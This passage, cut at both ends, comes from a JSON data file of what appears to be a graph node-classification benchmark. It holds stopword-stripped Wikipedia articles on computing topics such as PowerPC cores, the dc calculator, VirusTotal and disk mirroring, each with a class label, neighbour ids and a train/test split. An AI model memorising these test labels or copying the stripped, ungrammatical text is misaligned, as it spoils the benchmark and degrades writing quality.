    "text": "Compaq_Presario_M2000:compaq presario m2000 many models compaq presario m2000 ran intel celeron processor although also made amd turion 64 amd mobile sempron processors hard drive 40 gb 5400 rpm br display 15 glare type lcd br processor intel celeron 1.4 ghz amd turion ml-28 1.6ghz amd sempron br os provided windows xp home edition standard br memory expandable 1024mb ram br jacks inputs special buttons notifications connectivity security kensington lock slot",
    "neighbors": [
      6765
    ],
    "mask": "Test"
  },
  {
    "node_id": 1982,
    "label": 9,
    "text": "David_Turner_(computer_scientist):david turner computer scientist david a. turner born 1946 british computer scientist best known designing implementing first functional programming languages based lazy evaluation combinator graph reduction polymorphic types sasl 1972 krc 1981 commercially supported miranda 1985 miranda strong influence later haskell programming language d.phil university oxford held professorships queen mary college london university texas austin university kent canterbury spent career retains title emeritus professor computation also emeritus professor middlesex university england",
    "neighbors": [
      10403,
      3876,
      6536,
      12,
      2381,
      11020,
      5456,
      10581,
      7259
    ],
    "mask": "None"
  },
  {
    "node_id": 1983,
    "label": 3,
    "text": "PowerPC_e5500:powerpc e5500 powerpc e5500 64-bit power isa-based microprocessor core freescale semiconductor core implements core power isa v.2.06 hypervisor support altivec four issue seven-stage out-of-order pipeline double precision fpu three integer units 32/32 kb data instruction l1 caches 512 kb private l2 cache per core 2 mb shared l3 cache speeds range 2.5 ghz core designed highly configurable via corenet fabric meet specific needs embedded applications features like multi-core operation interface auxiliary application processing units apu e5500 based e500mc core adds new instructions introduced power isa 2.06 specification namely byte- bit-level acceleration parity population count bit permute compare byte fpu taken straight powerpc e600 core classic fully pipelined dual precision ieee 754 unit running full core speed supports conversion 64-bit floats integers effectively twice fast fpu e500mc e5500 also introduces enhanced branch prediction unit 8-entry link stack e5500 core first 64-bit power isa core designed solely freescale introduced freescale technology forum june 2010 simulated models available july 2010 hard samples late 2010 full scale manufacturing second half 2011 freescale used e700 ng-64 monikers refer similarly speced core since 2004 product e5500 powers high-performance qoriq p5 system chip soc family share common naming scheme p50x0 bae systems built radiation hardened computer based e5500 core devices space",
    "neighbors": [
      6914,
      7299,
      3844,
      4868,
      1158,
      3846,
      4743,
      6663,
      5642,
      3467,
      1548,
      1933,
      6926,
      6415,
      3472,
      4881,
      7305,
      7302,
      2073,
      7065,
      1563,
      1309,
      3493,
      6949,
      6311,
      8102,
      1321,
      8231,
      9391,
      10543,
      4017,
      5297,
      11314,
      1461,
      11447,
      8120,
      8761,
      6715,
      9020,
      1725,
      1985,
      10945,
      10180,
      3017,
      336,
      8530,
      3540,
      342,
      9302,
      3932,
      11613,
      6878,
      3936,
      10501,
      1635,
      8931,
      869,
      7269,
      10214,
      10985,
      9964,
      10734,
      8048,
      3185,
      4465,
      4211,
      5235,
      10224,
      630,
      3319,
      7286,
      8058,
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 1984,
    "label": 3,
    "text": "Fruity_Frank:fruity frank fruity frank 1984 computer game amstrad cpc msx home computers produced kuma software authored steve wallis graphics brother sean wallis gameplay similar mr though story involves frank protecting garden invading monsters player collect fruits lying around garden avoiding touching monsters apples pushed kill offer temporary respite monsters also killed throwing bouncing apple pip pieces fruit collected player proceeds next level level identifiable different colour background new jocular tune music game inspired traditional english songs rhymes fruity frank four types enemies every 1 000 points frank gains extra life maximum two 100 000 points reached counter set back 0",
    "neighbors": [
      11373,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 1985,
    "label": 3,
    "text": "Power_Processing_Element:power processing element power processing unit ppu 64-bit dual-threaded in-order powerpc 2.02 microprocessor core designed ibm use primarily game consoles playstation 3 xbox 360 also found applications high performance computing supercomputers record setting ibm roadrunner instances ppu joined 512 kb l2 cache form called power processing element ppe ppu used main cpu core three different processor designs ppu in-order processor unique traits allow achieve benefits out-of-order execution without expensive re-ordering hardware upon reaching l1 cache miss execute past cache miss stopping instruction actually dependent load send 8 load instructions l2 cache out-of-order instruction delay pipe side path allows execute instructions would normally cause pipeline stalls without holding rest pipeline instruction delay pipeline used out-of-order load/stores cache misses put moves ppe 23 stage general pipeline additional 11 stages possible microcode additional 4 stages possible branch prediction ppu runs two hardware threads simultaneously main registers code execution duplicated exception interrupt-handling registers several essential arrays queues generate exceptions simultaneously perform branch prediction individual branch histories execution engine caches duplicated though still single-core design 64-bit double precision floating-point unit 128-bit vmx unit using altivec instruction set perform theoretical 12 floating-point operations per cycle floating-point unit floating-point multiply-adds come smaller 64-bits gives 3.2 billion clock cycles 12 38.4 billion floating-point operations/second ppu enhanced powerxcell 8i processor able make single cycle double precision floating point operations tailored high performance computing supercomputers vmx unit xcpu xbox 360 enhanced 128 registers entirely compatible regular altivec",
    "neighbors": [
      9472,
      6914,
      643,
      4868,
      10501,
      3846,
      4743,
      5642,
      1548,
      1933,
      398,
      6926,
      3472,
      1563,
      1309,
      10658,
      3493,
      6949,
      6311,
      8102,
      1321,
      8231,
      9126,
      9391,
      10543,
      4017,
      306,
      5297,
      7218,
      1461,
      10675,
      9911,
      6072,
      8120,
      9020,
      1725,
      1983,
      10180,
      1480,
      3025,
      6738,
      8530,
      3540,
      342,
      9302,
      859,
      1115,
      731,
      3677,
      4060,
      6878,
      11613,
      1635,
      8931,
      9445,
      10214,
      8937,
      10985,
      4587,
      10734,
      1776,
      3185,
      4465,
      4211,
      5235,
      2293,
      6004,
      8700,
      1784,
      8058,
      3323,
      6268,
      6909
    ],
    "mask": "Test"
  },
  {
    "node_id": 1986,
    "label": 4,
    "text": "Bernard_Ardisana:bernard ardisana brigadier general bernard ardisana born 1924 died 1978 assistant deputy director operations national security agency fort george g. meade tenure us military also commanded usaf security service ’ 6924th security squadron went become vice commander usaf security service died january 14 1978 heart attack kimbrough army hospital ft. meade bernard ardisana born october 27 1924 tampa florida immediately completing high school 1943 enlisted u.s. army signal corps took position radio engineer stayed military three years returning civilian life attending university illinois graduated 1949 bachelor science degree economics 1966 officer air force reserve earned master arts degree education lady lake university san antonio texas april september 1961 ardisana attended graduated air command staff college maxwell air force base 1972 attended air war college maxwell air force base ardisana worked several u.s. military agencies including air force nsa army signal corps march 1952 called active duty train brooks air force base student traffic-analysis upon completion training august transferred washington dc work language officer armed forces security agency 1956 transferred fort meade developed new analysis techniques still use today 1958 transferred zweibrücken germany developed operations communications system still used cryptography community today 1963 1965 served chief operations inspection team kelly air force base san antonio texas 1966 became head operations systems evaluation management branch u.s. air force security service directorate operations 1967 1970 served vietnam various positions sent frankfurt germany act assistant deputy chief staff operations european security region returned united states 1972 1973 assigned ft. meade serve part national security agency stayed two years becoming vice commander u.s. air force security service retained position two years well returning nsa assistant deputy director operations ardisana died january 14 1978 kimbrough army hospital ft. meade heart attack serving nsa assistant deputy director operations ardisana expertise cryptography allowed develop number important changes usaf cryptologic operations procedures much work designing operations communications remained standard 25 years within us air force work key concept allowed development critical intelligence communication system",
    "neighbors": [
      6017,
      8726,
      1189,
      3495,
      9900,
      9517,
      1838,
      5308,
      6343,
      6344,
      11335,
      7759,
      7887,
      3154,
      8276,
      7893,
      991,
      7137,
      2148,
      3305,
      7145,
      2419,
      6005,
      6136
    ],
    "mask": "None"
  },
  {
    "node_id": 1987,
    "label": 9,
    "text": "Dc_(computer_program):dc computer program dc desk calculator cross-platform reverse-polish calculator supports arbitrary-precision arithmetic one oldest unix utilities predating even invention c programming language like utilities vintage powerful set features terse syntax traditionally bc calculator program infix notation implemented top dc article provides examples attempt give general flavour language complete list commands syntax one consult man page one specific implementation dc oldest surviving unix language home bell labs received pdp-11 dc—written b—was first language run new computer even assembler multiply four five dc note whitespace optional also get result commands translates push four five onto stack multiplication operator pop two elements stack multiply push result back stack p command used examine print screen top element stack q command quits invoked instance dc note numbers must spaced even operators need arithmetic precision changed command k sets number fractional digits number digits following point used arithmetic operations since default precision zero sequence commands produces 0 result adjusting precision k arbitrary number decimal places produced command sequence outputs '.66666 evaluate formula_1 v computes square root top stack used input negative number swap top two elements stack use r command duplicate top element use 'd command read line stdin use command evaluate line dc command necessary syntactically correct potentially security problem since dc command allow arbitrary command execution mentioned p print top stack newline n pop top stack output without trailing newline f dump entire stack one entry per line dc also supports arbitrary input output radices command pop top stack use input base hex digits must upper case avoid collisions dc commands limited a-f input radix larger 16 command output base keep mind input base affect parsing every numeric value afterwards usually advisable set output base first read values k commands push current precision input radix output radix top stack example convert hex binary addition basic arithmetic stack operations dc includes support macros conditionals storing results later retrieval mechanism underlying macros conditionals register dc storage location single character name stored retrieved 'sc pops top stack stores register c 'lc pushes value register c onto stack example registers also treated secondary stacks values pushed popped main stack using l commands string values enclosed characters may pushed stack stored registers command convert low order byte numeric value ascii character top stack string replace first character string ways build strings perform string manipulation executing x command printing p command character begins comment end line macros implemented allowing registers stack entries strings well numbers string printed also executed i.e processed sequence dc commands instance store macro add one multiply 2 register using x command executes top stack use like finally use macro mechanism provide conditionals command '=r pop two values stack execute macro stored register r equal print string 'equal top stack equal 5 conditionals execute specified macro top two values stack greater less equal greater less greater equal less equals respectively looping possible defining macro conditionally reinvokes simple factorial top stack might implemented '1q command exit macro allowing early return q quit two levels macros dc less two levels call stack z push current stack depth z operation print prime numbers example relatively simple program dc command 1 line convert distances metres feet inches bulk concerned prompting input printing output suitable format looping round convert another number example implementation euclidean algorithm find greatest common divisor|gcd category cross-platform software category unix software category software calculators category free mathematics software category numerical programming languages category stack-oriented programming languages",
    "neighbors": [
      515,
      9733,
      9735,
      3976,
      4750,
      2198,
      6812,
      7847,
      4398,
      823,
      1336,
      7356,
      965,
      8522,
      3659,
      7883,
      9298,
      9946,
      6369,
      6120,
      5612,
      4850,
      5492,
      9204,
      6138,
      2045,
      5759
    ],
    "mask": "Train"
  },
  {
    "node_id": 1988,
    "label": 1,
    "text": "Cdb_(software):cdb software cdb short constant database refers library data format created daniel j. bernstein cdb acts on-disk associative array mapping keys values allows multiple values stored single key constant database allows two operations creation reading operations designed fast highly reliable since database change use multiple processes access single database without locking additionally since modifications actually creation replacement database take advantage unix filesystem semantics provide guarantee reliability record positions key value lengths hash values 32-bit quantities stored 4 bytes thus cdb must fit 4 gigabytes cdb used djbdns fastforward mess822 qmail ucspi-tcp provide highly efficient reliable simple data access database contains entire data set e.g single associative array single computer file consists three parts fixed-size header data set hash tables lookups designed exact keys though types searches could performed scanning entire database lookups performed using following algorithm lookups keys multiple values additional values may found simply resuming search next slot numbers—offsets lengths hash values—are unsigned 32-bit integers stored little endian format keys data considered opaque byte strings special treatment fixed-size header beginning database describes 256 hash tables listing position within file length slots data stored series records storing key length data length key data alignment sorting rules records followed set 256 hash tables varying lengths since zero valid length may fewer 256 hash tables physically stored database nonetheless considered 256 tables hash tables contain series slots contains hash value record offset empty slots offset zero hashes unsigned 32 bit integers start value 5381 byte key current hash multiplied 33 xor'ed current byte key overflow bits discarded slots tables trivially computed hashes target table simply lowest eight bits hash i.e hash modulo 256 slot within table remaining bits hash modulo table length i.e hash divided 256 modulo table length official cdb library code public domain individual source files marked also available public domain djbdns package however rest cdb package used license-free software meaning must distributed verbatim unusual licensing simplicity format prompted others re-implement library release common terms michael tokarev tinycdb library available public domain 2009 cdb put public domain notably creator cdb intend cdb used shared library differs virtually similar databases berkeley db",
    "neighbors": [
      2432,
      2804,
      2901,
      1594,
      5468
    ],
    "mask": "Test"
  },
  {
    "node_id": 1989,
    "label": 5,
    "text": "SSHFP_record:sshfp record secure shell fingerprint record abbreviated sshfp record type resource record domain name system dns identifies ssh keys associated host name acquisition sshfp record needs secured mechanism dnssec chain trust established example host domain name codice_1 uses dsa key sha-1 fingerprint codice_2",
    "neighbors": [
      3018,
      10341,
      2887
    ],
    "mask": "None"
  },
  {
    "node_id": 1990,
    "label": 3,
    "text": "Disk_mirroring:disk mirroring data storage disk mirroring replication logical disk volumes onto separate physical hard disks real time ensure continuous availability commonly used raid 1 mirrored volume complete logical representation separate volume copies disaster recovery context mirroring data long distance referred storage replication depending technologies used replication performed synchronously asynchronously semi-synchronously point-in-time replication enabled via microcode disk array controller via server software typically proprietary solution compatible various data storage device vendors mirroring typically synchronous synchronous writing typically achieves recovery point objective rpo zero lost data asynchronous replication achieve rpo seconds remaining methodologies provide rpo minutes perhaps several hours disk mirroring differs file shadowing operates file level disk snapshots data images never re-synced origins recognized disks inherently unreliable component computer systems mirroring technique allow system automatically maintain multiple copies dual backup meaning data redundant hard drives exist mirror data event disk hardware failure system continue process quickly recover data mirroring may done locally specifically cater disk unreliability may done remotely forms part sophisticated disaster recovery scheme may done locally remotely especially high availability systems normally data mirrored onto physically identical drives though process applied logical drives underlying physical format hidden mirroring process typically mirroring provided either hardware solutions disk arrays software within operating system linux mdadm device mapper additionally file systems like btrfs zfs provide integrated data mirroring additional benefits btrfs zfs maintain data metadata integrity checksums making capable detecting bad copies blocks using mirrored data pull data correct blocks several scenarios happens disk fails hot swap system event disk failure system typically diagnoses disk failure signals failure sophisticated systems may automatically activate hot standby disk use remaining active disk copy live data onto disk alternatively new disk installed data copied less sophisticated systems system operated remaining disk spare disk installed copying data one side mirror pair another called rebuilding less commonly resilvering mirroring performed site site either rapid data links example fibre optic links distances 500 maintain adequate performance support real-time mirroring longer distances slower links maintain mirrors using asynchronous copying system remote disaster recovery systems mirroring may done integrated systems simply additional applications master slave machines addition providing additional copy data purpose redundancy case hardware failure disk mirroring allow disk accessed separately reading purposes certain circumstances significantly improve performance system choose read disk seek quickly required data especially significant several tasks competing data disk thrashing switching tasks takes time task reduced important consideration hardware configurations frequently access data disk implementations mirrored disk split used data backup allowing first disk remain active however merging two disks may require synchronization period write i/o activity occurred mirrored disk mirroring schemes employ three disks two disks redundancy mirroring third split performing backups emc nomenclature third disks called business continuance volumes bcvs",
    "neighbors": [
      3328,
      1412,
      2564,
      7173,
      1801,
      10382,
      1049,
      9882,
      9762,
      3366,
      4011,
      11179,
      10302,
      7106,
      8772,
      1993,
      8266,
      9677,
      4438,
      3927,
      7802,
      1891,
      3692,
      9455,
      6514,
      6003,
      9844,
      2421,
      3450,
      6014,
      9343
    ],
    "mask": "Test"
  },
  {
    "node_id": 1991,
    "label": 8,
    "text": "Apache_Karaf:apache karaf apache karaf modular open source osgi release 6 runtime environment project became top level project 2010 previously subproject apache servicemix apache karaf work top two used osgi frameworks apache felix equinox osgi providing additional features karaf container modern polymorphic container lightweight powerful enterprise ready container powered osgi polymorphic means karaf host kind applications osgi spring war much karaf use standalone container bootstrap way using karaf boot karaf cellar clustering solution karaf allows manage multiple instances synchronization instances latest release 4.1.3 february 25 2019 karaf cave implementation osgi repository specification used karaf features resolver provide resources dealing requirements capabilities artifacts latest release 4.1.2 january 19 2019 decanter provides ready use monitoring solution including alerting key feature bam business activities monitoring also completely extensible customizable latest release 2.2.0 march 22 2019",
    "neighbors": [
      9229,
      7695,
      6161,
      1047,
      8217,
      2596,
      11303,
      44,
      5677,
      10800,
      6714,
      9789,
      7742,
      7233,
      7750,
      595,
      7261,
      8799,
      8294,
      8810,
      2163,
      6774,
      11386,
      10377,
      8860,
      8350,
      3746,
      3237,
      7338,
      9387,
      11439,
      6338,
      1222,
      4294,
      8408,
      225,
      1250,
      4837,
      8425,
      747,
      6379,
      2287,
      7430,
      8460,
      1296,
      7443,
      7457,
      8994,
      3877,
      1327,
      7983,
      4919,
      1851,
      7485,
      4419,
      4944,
      1363,
      4439,
      865,
      2404,
      11111,
      9580,
      10611,
      1913,
      3966,
      10622,
      1920,
      11134,
      4485,
      7567,
      1937,
      11161,
      6555,
      11682,
      9125,
      10661,
      5047,
      4538,
      6074,
      5066,
      8139,
      3545,
      9179,
      990,
      10719,
      11235,
      5612,
      8691,
      7159,
      1018
    ],
    "mask": "Test"
  },
  {
    "node_id": 1992,
    "label": 4,
    "text": "Riskware:riskware riskware portmanteau risk software word used describe software whose installation execution poses possible yet definite risk host computer relatively normal programs often fall category riskware applications modified another purpose used computer user owner",
    "neighbors": [
      7515,
      5540,
      4309
    ],
    "mask": "Test"
  },
  {
    "node_id": 1993,
    "label": 2,
    "text": "Bioctl:bioctl bio 4 pseudo-device driver bioctl 8 utility implement generic raid volume management interface openbsd netbsd idea behind software similar ifconfig single utility operating system used control raid controller using generic interface instead rely plentiful proprietary custom raid management utilities specific given hardware raid manufacturer features include monitoring health status arrays controlling identification blinking leds managing sound alarms specifying hot spare disks additionally codice_1 configuration openbsd delegated bioctl well whereas initial creation volumes configuration hardware raid left card bios non-essential operating system already booted interfacing kernel userland performed codice_2 system call codice_3 pseudo-device bio/bioctl subsystem deemed important part openbsd advocacy open hardware documentation 3.8 release title titular song dedicated topic — hackers lost raid development took place time controversy adaptec refused release appropriate hardware documentation necessary order make aac 4 driver work reliably followed openbsd disabling support driver commentary 3.8 release developers express irony hardware raid controllers supposed purpose providing reliability redundancy repair whereas reality many vendors expect system administrators install depend huge binary blobs order assess volume health service disk arrays specifically openbsd making reference modus operandi freebsd documentation aac 4 driver adaptec specifically suggests enabling linux compatibility layer order use management utilities documentation even fails explain exactly utilities must obtained versions would compatible evidently proprietary tools may expired likewise openbsd developers intentionally chose concentrate supporting basic features controller uniform across brands variations specifically fact initial configuration controller must still made card bios never kept secret bio/bioctl announcement contrasted approach taken freebsd example individual utilities exist several independent raid drivers interface utility independent one another specifically freebsd includes separate device-specific utilities called codice_4 codice_5 codice_6/codice_7 codice_8 provides many options least subtle differences interface configuration management controllers contributes code bloat mention additional drivers tool even exists open-source software openbsd 6.4 2018 dozen drivers register bio framework monitoring state logical drive also duplicated hardware monitoring frameworks corresponding utilities systems bioctl available — hw.sensors sensorsd openbsd sysmon envsys envstat powerd netbsd example openbsd since 4.2 release status drive sensors could automatically monitored simply starting sensorsd without specific configuration required drivers converted use bio sensors frameworks release openbsd scsi enclosure services ses saf-te supported since openbsd 3.8 2005 well feature led blinking bio bioctl implementing codice_10 ioctl helping system administrators identify devices within enclosures service additionally ses saf-te drivers openbsd feature support combination temperature fan sensors psu doorlock alarm indicators auxiliary sensor data exported hw.sensors framework openbsd monitored familiar tools like sysctl snmp sensorsd netbsd older ses/saf-te driver nasa 2000 still place integrated bio envsys device files unique ioctl interface featuring custom scsi-specific userland tooling older implementation also available openbsd 2000 2005 removed 2005 together userland tools new leaner bio- hw.sensors-based alternative drivers introduced ses saf-te kept two separate drivers openbsd n't require separate custom userland utilities anymore reducing code bloat number source lines code",
    "neighbors": [
      1286,
      9223,
      10631,
      1801,
      2825,
      3465,
      1932,
      10000,
      274,
      7702,
      1049,
      10105,
      9762,
      8998,
      11179,
      6702,
      1071,
      7983,
      9520,
      11698,
      3133,
      2245,
      1990,
      9671,
      8778,
      3404,
      8909,
      9677,
      11086,
      1361,
      5970,
      4438,
      7383,
      7802,
      4571,
      5084,
      1891,
      7139,
      1637,
      7907,
      4071,
      1515,
      8954,
      5230,
      2415,
      8816,
      2545,
      11506,
      6003,
      2421,
      10102,
      1785,
      3450,
      2045,
      6014,
      9343
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1994,
    "label": 4,
    "text": "VirusTotal:virustotal virustotal website created spanish security company hispasec sistemas launched june 2004 acquired google inc. september 2012 company ownership switched january 2018 chronicle subsidiary alphabet inc.. virustotal aggregates many antivirus products online scan engines check viruses user antivirus may missed verify false positives files 550 mb uploaded website sent via email anti-virus software vendors receive copies files flagged scans passed engine help improve software extension virustotal capability users also scan suspect urls search virustotal dataset virustotal dynamic analysis malware uses cuckoo sandbox virustotal selected pc world one best 100 products 2007 virustotal windows uploader application integrates explorer right-click contextual menu listed send virus total application also launches manually submitting url program currently running os virustotal stores name various hashes scanned file already scanned files identified known e.g. vt default sha256 hash without uploading complete files sha256 query url form codice_1 file uploads normally limited 128 mb 2017 virustotal discontinued support windows uploader several browser extensions available vtzilla mozilla firefox vtchromizer google chrome vtexplorer internet explorer allow user download files directly virustotal web application prior storing computer well scanning urls service also offers android app employs public api search installed application virustotal previously scanned ones show status application previously scanned submitted api key must provided restrictions public api usage may apply see public api virustotal provides free service public api allows automation online features upload scan files submit scan urls access finished scan reports make automatic comments urls samples restrictions apply requests made public api requiring individual api key freely obtained online signing low priority scan queue limited number requests per time frame etc antivirus engines used detection uploading files. ref name= files/url /ref antivirus scanning engines used url scanning utilities used provide additional info uploaded files files uploaded virustotal may shared freely anti-malware companies also retained store virustotal page states virustotal confidentiality files urls sent virustotal shared antivirus vendors security companies help improving services products believe eventually lead safer internet better end-user protection default file/url submitted virustotal detected least one scanner freely sent scanners detect resource additionally files urls enter private store may accessed premium mainly security/antimalware companies/organizations virustotal users improve security products services",
    "neighbors": [
      2945,
      7809,
      131,
      5891,
      8330,
      10637,
      10898,
      10772,
      4760,
      1052,
      4382,
      8478,
      11166,
      5540,
      2213,
      550,
      1318,
      8615,
      6059,
      6699,
      4013,
      176,
      4403,
      7739,
      830,
      704,
      9537,
      7362,
      4421,
      202,
      1355,
      5069,
      8526,
      10574,
      7251,
      2005,
      8024,
      8664,
      1242,
      7515,
      11225,
      735,
      9055,
      9569,
      2147,
      4972,
      8172,
      9712,
      9713,
      3955,
      3065,
      7035,
      127
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1995,
    "label": 7,
    "text": "Open_Source_Cluster_Application_Resources:open source cluster application resources open source cluster application resources oscar linux-based software installation high-performance cluster computing oscar allows users install beowulf type high performance computing cluster",
    "neighbors": [
      330,
      10597,
      3055
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1996,
    "label": 4,
    "text": "Code42:code42 code42 american software company develops markets crashplan backup software services suite code42 started project create facebook-like desktop application ended focusing online storage element released crashplan 2007 company raised 52.5 million 2012 consumers use crashplan small business plan requires monthly subscription backup cloud plans larger enterprises also available crashplan initially got positive reviews pricing feature-set user interface large initial backups reported slow august 2017 original home plans discontinued business-focused plans remaining options code42 founded consulting company 2001 matthew dornquast brian bispala mitch coopet company name honors douglas adams authored hitchhiker ’ guide galaxy died year book number 42 answer ultimate question life universe everything code42 first projects included redesign sun country airlines ’ website 2002 project retailer target corporation ticket booking engine midwest airlines income services business used fund product ideas six years 2006 company planned create facebook-like desktop application project became large impractical code42 focused online storage element application creating crashplan 2007 june 2011 code42 acquired minneapolis-based mobile development company recursive awesome llc support software mobile devices recursive ’ employees moved minneapolis headquarters later 10,000 square-foot expansion offices built 2012 code42 raised 52.5 million funding funding first distribution 100 million pool established 2011 accel partners fund big data companies mid 2015 former eloqua ceo joe payne succeeded co-founder matthew dornquast ceo company raised additional 85 million funding october 2015 august 22 2017 code42 announced shutting crashplan home october 2018 accepting new subscriptions would maintain existing subscriptions end existing subscription period point backups would purged old home plans replaced former pro plans business-focused although still possible use private purposes backups friends/family supported new product company explained shift business strategy focus exclusively enterprise small business segments two great options continue getting best backup solution. code42 ranked leader backup software recent g2 crowd backup survey summer 2017 april 2011 80 code42 software ’ revenue comes business customers remainder comes consumers small portion service provider partners code42 profitable year since founded grew 1.4 million revenue 2008 11.46 million 2010 18.5 million 2011 2012 company backed 100 petabytes data processed 100 billion files day code42 best known developing marketing crashplan data backup service crashplan backs data remote servers hard drives backup computers longer supported available mac windows linux also crashplan pro proe mobile apps accessing backed-up data ios android windows devices initial backups may take several hours via lan days internet depending amount data bandwidth available afterwards continuous incremental backups conducted without user intervention used paid option seed loading hard drive sent user faster local backup could performed drive could shipped back code42 initial backup however seeded backup service longer available around beginning 2016 neither corresponding restore-to-door service would allow hard drive containing extensive restore data backups shipped back user faster over-the-internet download data encrypted password-protected stored proprietary format also option secure private key corporate users crashplan proe back private servers instead code42 data centers four five cases software option create private on-site backup server code42 used develop market file sharing service called shareplan released october 2013 according star tribune competed dropbox shareplan used pin access files track users october 2014 revision software added features regulatory compliance like sarbanes-oxley options private public hybrid cloud deployment single login crashplan using feature called code42 edge platform improved december 2014 two-factor authentication features shareplan discontinued august 2015 22 august 2017 code42 stopped offering new subscriptions consumers focusing business plans code42 also stopped renewals existing customers comparative review published wall street journal geoffrey fowler observed crashplan favorite four services evaluated observed lacked fine print whereas services charged additional fees basic features n't really unlimited pc magazine gave crashplan 4.5 5 stars awarded editor choice review praised user interface local backup options security features said mobile explorer-based features limited product review macworld gave crashplan rating 4.5 5 gartner gave enterprise version crashplan proe excellent rating techworld praised crashplan operating system support configuration options ars technica said crashplan better features pricing options competitors",
    "neighbors": [
      9025,
      8204,
      3692,
      6797,
      4623,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 1997,
    "label": 5,
    "text": "Synchronous_serial_communication:synchronous serial communication synchronous serial communication describes serial communication protocol data sent continuous stream constant rate synchronous communication requires clocks transmitting receiving devices synchronized – running rate – receiver sample signal time intervals used transmitter start stop bits required reason synchronous communication permits information passed circuit per unit time asynchronous serial communication time transmitting receiving clocks tend drift apart requiring resynchronization early synchronous protocols byte-oriented protocols synchronization maintained transmitting sequence synchronous idle characters line actively transmitting data transparently within long transmission block certain number idles sent prior transmission ibm binary synchronous protocol bisync still use examples byte-oriented protocols ibm synchronous transmit-receive str digital data communications message protocol ddcmp digital equipment corporation computer manufacturers often offered similar protocols differing mainly small details bit-oriented protocols synchronous protocols view transmitted data stream bits semantics meaning control codes defined terms bit sequences instead characters synchronization maintained idle line transmitting predefined sequence bits synchronous data link control sdlc specifies station continue transmitting sequence 1 bits idle line data transmitted idle line prefixed special bit sequence '01111110 b called flag sdlc first bit-oriented protocol developed later adopted international organization standardization iso high-level data link control hdlc examples bit-oriented protocols logical link control llc —ieee 802.2 ansi advanced data communication control procedures adccp",
    "neighbors": [
      1478,
      4543,
      8138,
      6544,
      10833,
      11217,
      2746,
      5439
    ],
    "mask": "None"
  },
  {
    "node_id": 1998,
    "label": 3,
    "text": "Ice_Lake_(microprocessor):ice lake microprocessor ice lake intel codename 10th generation intel core processors based new sunny cove microarchitecture ice lake expected replace coffee lake whiskey lake kaby lake cannon lake microarchitectures 2019 2020 representing architecture step intel process-architecture-optimization model ice lake produced second generation intel 10 nm process 10 nm+ becoming intel second microarchitecture manufactured 10 nm process following limited launch cannon lake 2018 ice lake designed intel israel processor design team haifa israel expected ice lake in-silicon mitigations certain meltdown spectre hardware vulnerabilities intel released details ice lake intel architecture day december 2018 stating sunny cove core ice lake would focusing single-thread performance new instructions scalability improvements intel stated performance improvements would achieved making core deeper wider smarter core ice lake built sunny cove features 50 increase size l1 data cache larger l2 cache size product dependent larger μop cache larger 2nd level tlb core also increased width increasing execution ports 8 10 doubling l1 store bandwidth allocation width also increased 4 5 paging table main memory supports linear address space 57 bits physical address space 52 bits increasing theoretical addressable memory space 4 pb 64 tb ice lake features intel gen11 graphics increasing number execution units eus 64 24 48 gen9.5 graphics achieving 1 tflops compute performance eu supports 7 threads meaning design 512 concurrent pipelines feeding eus 3 mb l3 cache 4x increase gen9.5 alongside increased memory bandwidth enabled lpddr4x low-power mobile platforms gen11 graphics also introduces tile-based rendering coarse pixel shading cps intel implementation variable-rate shading vrs architecture also includes all-new hevc encoder design august 1 2019 intel released specifications icelake u cpus cpus lost suffix m3 naming instead intel uses trailing zero indicate power package 9w pre-orders laptops featuring ice lake cpus started august 2019 shipment expected september",
    "neighbors": [
      3457,
      3459,
      5380,
      2821,
      3973,
      8325,
      9095,
      5386,
      9611,
      4108,
      9741,
      398,
      5649,
      7313,
      5523,
      6804,
      8851,
      4886,
      9111,
      3352,
      9500,
      5883,
      2088,
      10669,
      9391,
      10675,
      4276,
      1461,
      10548,
      2237,
      5309,
      8125,
      8126,
      833,
      6339,
      5444,
      9541,
      1998,
      2638,
      977,
      2514,
      5073,
      2516,
      5844,
      8795,
      9435,
      7134,
      1119,
      9057,
      1000,
      7657,
      4204,
      5356,
      8684,
      5871,
      9582,
      10734,
      499,
      8820,
      3317,
      4217,
      4603,
      5503
    ],
    "mask": "None"
  },
  {
    "node_id": 1999,
    "label": 9,
    "text": "SMALL:small small small machine algol like language programming language developed dr. nevil brownlee auckland university aim language enable people write algol-like code ran small machine also included string type easier text manipulation small used extensively 1980 1985 auckland university programming teaching aid internal projects originally written run burroughs corporation b6700 main frame fortran iv subsequently rewritten small ported dec pdp-10 architecture operating system tops-10 ibm s360 architecture operating system vm/cms 1985 small object-oriented features added handle structures missing early language formalise file manipulation operations",
    "neighbors": [
      512,
      8262,
      4777,
      1804,
      338,
      3960,
      8474,
      8509,
      3613
    ],
    "mask": "None"
  },
  {
    "node_id": 2000,
    "label": 9,
    "text": "Stan_(software):stan software stan probabilistic programming language statistical inference written c++ stan language used specify bayesian statistical model imperative program calculating log probability density function stan licensed new bsd license stan named honour stanislaw ulam pioneer monte carlo method stan created andrew gelman bob carpenter development team consisting 34 members stan accessed several interfaces stan implements gradient-based markov chain monte carlo mcmc algorithms bayesian inference stochastic gradient-based variational bayesian methods approximate bayesian inference gradient-based optimization penalized maximum likelihood estimation stan implements reverse-mode automatic differentiation calculate gradients model required hmc nuts l-bfgs bfgs variational inference automatic differentiation within stan used outside probabilistic programming language stan used fields including social science pharmaceutical statistics market research medical imaging",
    "neighbors": [
      5380,
      5129,
      7945,
      3980,
      2317,
      6797,
      7950,
      5397,
      2457,
      7580,
      7326,
      7983,
      6962,
      6718,
      5830,
      5703,
      4808,
      5833,
      5450,
      9926,
      11221,
      9944,
      2652,
      10848,
      4840,
      9320,
      363,
      5356,
      5612,
      7924
    ],
    "mask": "Test"
  },
  {
    "node_id": 2001,
    "label": 2,
